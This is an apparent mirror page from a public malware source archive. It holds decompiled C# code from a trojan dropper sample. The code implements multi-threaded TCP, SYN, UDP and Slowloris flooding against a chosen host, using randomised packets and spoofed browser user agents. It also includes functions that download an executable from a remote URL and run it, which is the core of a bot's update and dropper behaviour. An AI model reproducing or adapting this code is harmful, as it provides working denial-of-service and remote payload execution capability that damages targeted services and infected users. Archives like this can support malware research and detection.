mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
408 lines
13 KiB
C#
408 lines
13 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Poly.Function
|
|
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
|
|
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Net;
|
|
using System.Net.Sockets;
|
|
using System.Security.Cryptography;
|
|
using System.Text;
|
|
using System.Threading;
|
|
|
|
namespace Poly
|
|
{
|
|
public static class Function
|
|
{
|
|
private static bool active;
|
|
private static string host;
|
|
private static int port;
|
|
private static int sockets;
|
|
private static int timeout;
|
|
private static int packets;
|
|
private static Function.Type currentType;
|
|
public static Thread bThread;
|
|
private static string[] userAgents = new string[28]
|
|
{
|
|
"(compatible; MSIE 6.0; Windows NT)",
|
|
"(Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5",
|
|
"(Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1",
|
|
"(MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
|
|
"[en] (WinNT; U)",
|
|
"(compatible; MSIE 7.0; Windows NT 5.1; bgft)",
|
|
"(compatible; MSIE 6.0; Win32)",
|
|
"(X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01",
|
|
"(X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801",
|
|
"(SunOS 5.8 sun4u; U) Opera 5.0 [en]",
|
|
"(compatible; Googlebot/2.1; http://www.google.com/bot.html)",
|
|
"(X11; U; Linux i686; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 BAVM/1.0.0",
|
|
"(X11; U; Linux i686; en-US; rv:1.9.1a2pre) Gecko/2008073000 Shredder/3.0a2pre ThunderBrowse/3.2.1.8",
|
|
"(Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Firefox/3.6",
|
|
"Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326",
|
|
"(Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50",
|
|
"(Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
|
|
"(X11; Linux x86_64; U; Linux Mint; en) Presto/2.2.15 Version/10.10",
|
|
"(Macintosh; PPC Mac OS X; U; en) Opera 8.0",
|
|
"(Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128",
|
|
"(Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
|
|
"(iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3",
|
|
"(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)",
|
|
"(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)",
|
|
"(Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
|
|
"(compatible; MSIE 6.1; Windows XP; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
|
|
"(compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
|
|
"(Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
|
|
};
|
|
private static string[] browsers = new string[10]
|
|
{
|
|
"Opera/9.0",
|
|
"Opera/8.90",
|
|
"Opera/9.80",
|
|
"Opera/9.33",
|
|
"Mozilla/5.0",
|
|
"Mozilla/4.08",
|
|
"Mozilla/4.0",
|
|
"Mozilla/3.6",
|
|
"Mozilla/3.1",
|
|
"Mozilla/3.0"
|
|
};
|
|
|
|
public static bool Active => Function.active;
|
|
|
|
public static Function.Type CurrentType => Function.currentType;
|
|
|
|
public static string MD5Hash(string input)
|
|
{
|
|
byte[] hash = MD5.Create().ComputeHash(Encoding.ASCII.GetBytes(input));
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|
for (int index = 0; index < hash.Length; ++index)
|
|
stringBuilder.Append(hash[index].ToString("X2"));
|
|
return stringBuilder.ToString();
|
|
}
|
|
|
|
public static string CurrentTypeAsString
|
|
{
|
|
get
|
|
{
|
|
switch (Function.currentType)
|
|
{
|
|
case Function.Type.TCP:
|
|
return "TCP";
|
|
case Function.Type.SYN:
|
|
return "SYN";
|
|
case Function.Type.UDP:
|
|
return "UDP";
|
|
case Function.Type.Slowloris:
|
|
return "Slowloris";
|
|
default:
|
|
return (string) null;
|
|
}
|
|
}
|
|
}
|
|
|
|
public static void InitFlood(
|
|
Function.Type type,
|
|
string Host,
|
|
int Port,
|
|
int Sockets,
|
|
int Packets,
|
|
int Timeout)
|
|
{
|
|
Function.currentType = type;
|
|
Function.host = Host;
|
|
Function.port = Port;
|
|
Function.sockets = Sockets;
|
|
Function.packets = Packets;
|
|
Function.timeout = Timeout;
|
|
Function.active = false;
|
|
}
|
|
|
|
public static void Begin()
|
|
{
|
|
Function.active = true;
|
|
Function.bThread = new Thread(new ThreadStart(Function.backStart));
|
|
Function.bThread.Start();
|
|
}
|
|
|
|
public static void Abort()
|
|
{
|
|
Function.active = false;
|
|
Function.bThread.Abort();
|
|
}
|
|
|
|
private static void backStart()
|
|
{
|
|
for (int index = 0; index < Function.sockets; ++index)
|
|
{
|
|
try
|
|
{
|
|
new Thread(new ThreadStart(Function.stress))
|
|
{
|
|
IsBackground = true
|
|
}.Start();
|
|
}
|
|
catch (OutOfMemoryException ex)
|
|
{
|
|
Function.sockets = index - 1;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
private static void stress()
|
|
{
|
|
int num = 0;
|
|
while (Function.active)
|
|
{
|
|
switch (Function.currentType)
|
|
{
|
|
case Function.Type.TCP:
|
|
Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
|
|
socket1.Blocking = false;
|
|
while (num < Function.packets)
|
|
{
|
|
if (Function.active)
|
|
{
|
|
try
|
|
{
|
|
socket1.Connect(Function.host, Function.port);
|
|
socket1.Send(Function.tcpRandom());
|
|
socket1.Close();
|
|
socket1 = (Socket) null;
|
|
}
|
|
catch
|
|
{
|
|
socket1.Close();
|
|
break;
|
|
}
|
|
++num;
|
|
Thread.Sleep(1);
|
|
}
|
|
else
|
|
break;
|
|
}
|
|
Thread.Sleep(Function.timeout);
|
|
break;
|
|
case Function.Type.SYN:
|
|
Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
|
|
socket2.Blocking = false;
|
|
try
|
|
{
|
|
socket2.BeginConnect(Function.host, Function.port, new AsyncCallback(Function.onConnect), (object) null);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
Thread.Sleep(100);
|
|
try
|
|
{
|
|
if (socket2.Connected)
|
|
socket2.Disconnect(false);
|
|
socket2.Close();
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
Thread.Sleep(Function.timeout);
|
|
break;
|
|
case Function.Type.UDP:
|
|
Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
|
|
socket3.Blocking = false;
|
|
Socket socket4;
|
|
try
|
|
{
|
|
socket3.Connect(Function.host, Function.port);
|
|
while (num < Function.packets && Function.active)
|
|
{
|
|
socket3.Send(Function.udpRandom());
|
|
++num;
|
|
Thread.Sleep(1);
|
|
}
|
|
socket3.Close();
|
|
socket4 = (Socket) null;
|
|
}
|
|
catch
|
|
{
|
|
socket3.Close();
|
|
socket4 = (Socket) null;
|
|
break;
|
|
}
|
|
Thread.Sleep(Function.timeout);
|
|
break;
|
|
case Function.Type.Slowloris:
|
|
Socket socket5 = (Socket) null;
|
|
try
|
|
{
|
|
socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
|
|
socket5.Connect(Function.host, Function.port);
|
|
socket5.Send(Function.GenerateRequest());
|
|
while (socket5.Connected)
|
|
{
|
|
if (Function.active)
|
|
{
|
|
socket5.Send(Function.GenerateRequest());
|
|
Thread.Sleep(2000);
|
|
}
|
|
else
|
|
break;
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
socket5.Close();
|
|
}
|
|
Thread.Sleep(Function.timeout);
|
|
break;
|
|
}
|
|
num = 0;
|
|
}
|
|
if (!Function.active)
|
|
return;
|
|
Function.Abort();
|
|
}
|
|
|
|
private static void onConnect(IAsyncResult ar)
|
|
{
|
|
}
|
|
|
|
private static byte[] udpRandom()
|
|
{
|
|
Random random = new Random();
|
|
byte[] buffer = new byte[random.Next(1470, 65507)];
|
|
random.NextBytes(buffer);
|
|
return buffer;
|
|
}
|
|
|
|
private static byte[] tcpRandom()
|
|
{
|
|
Random random = new Random();
|
|
byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)];
|
|
random.NextBytes(buffer);
|
|
return buffer;
|
|
}
|
|
|
|
private static byte[] GenerateRequest()
|
|
{
|
|
Random random = new Random();
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|
stringBuilder.AppendLine("GET / HTTP/1.1");
|
|
stringBuilder.AppendLine("Host: " + Function.host);
|
|
stringBuilder.AppendLine("User-Agent: " + Function.browsers[random.Next(0, Function.browsers.Length - 1)] + " " + Function.userAgents[random.Next(0, Function.userAgents.Length - 1)]);
|
|
stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString());
|
|
stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString());
|
|
stringBuilder.Append("Connection: keep-alive");
|
|
return Encoding.ASCII.GetBytes(stringBuilder.ToString());
|
|
}
|
|
|
|
public static bool DlExecute(string URL)
|
|
{
|
|
try
|
|
{
|
|
Process.Start(Function.download(URL));
|
|
return true;
|
|
}
|
|
catch
|
|
{
|
|
return false;
|
|
}
|
|
}
|
|
|
|
public static bool DlExecute(string URL, string MD5)
|
|
{
|
|
try
|
|
{
|
|
string str = Function.download(URL);
|
|
if (Function.verifyMD5(str, MD5))
|
|
Process.Start(str);
|
|
return true;
|
|
}
|
|
catch
|
|
{
|
|
return false;
|
|
}
|
|
}
|
|
|
|
private static string download(string URL)
|
|
{
|
|
string str = string.Empty;
|
|
Uri result;
|
|
bool flag = Uri.TryCreate(URL, UriKind.Absolute, out result);
|
|
if (!flag)
|
|
str = "http://" + URL;
|
|
Console.WriteLine("Url is : {0}", (object) result);
|
|
if (flag)
|
|
{
|
|
try
|
|
{
|
|
string absoluteUri = result.AbsoluteUri;
|
|
string fileName = Path.GetTempFileName() + ".exe";
|
|
WebClient webClient = new WebClient();
|
|
webClient.DownloadFile(absoluteUri, fileName);
|
|
webClient.Dispose();
|
|
return fileName;
|
|
}
|
|
catch
|
|
{
|
|
return string.Empty;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
try
|
|
{
|
|
string address = str;
|
|
string fileName = Path.GetTempFileName() + ".exe";
|
|
WebClient webClient = new WebClient();
|
|
webClient.DownloadFile(address, fileName);
|
|
webClient.Dispose();
|
|
return fileName;
|
|
}
|
|
catch
|
|
{
|
|
return string.Empty;
|
|
}
|
|
}
|
|
}
|
|
|
|
private static string getMD5(string path)
|
|
{
|
|
byte[] hash;
|
|
using (Stream inputStream = (Stream) new BufferedStream((Stream) new FileStream(path, FileMode.Open), 1200000))
|
|
hash = new MD5CryptoServiceProvider().ComputeHash(inputStream);
|
|
StringBuilder stringBuilder = new StringBuilder();
|
|
for (int index = 0; index < hash.Length; ++index)
|
|
stringBuilder.Append(hash[index].ToString("x2"));
|
|
return stringBuilder.ToString();
|
|
}
|
|
|
|
private static bool verifyMD5(string ExecutablePath, string MD5)
|
|
{
|
|
string md5 = Function.getMD5(ExecutablePath);
|
|
return MD5.Length == 32 && StringComparer.OrdinalIgnoreCase.Compare(md5, MD5) == 0;
|
|
}
|
|
|
|
public static string Update(string url)
|
|
{
|
|
string str = Function.download(url);
|
|
return str == string.Empty ? string.Empty : str;
|
|
}
|
|
|
|
public static string Update(string url, string md5)
|
|
{
|
|
string ExecutablePath = Function.download(url);
|
|
return ExecutablePath == string.Empty || !Function.verifyMD5(ExecutablePath, md5) ? string.Empty : ExecutablePath;
|
|
}
|
|
|
|
public enum Type
|
|
{
|
|
TCP,
|
|
SYN,
|
|
UDP,
|
|
Slowloris,
|
|
}
|
|
}
|
|
}
|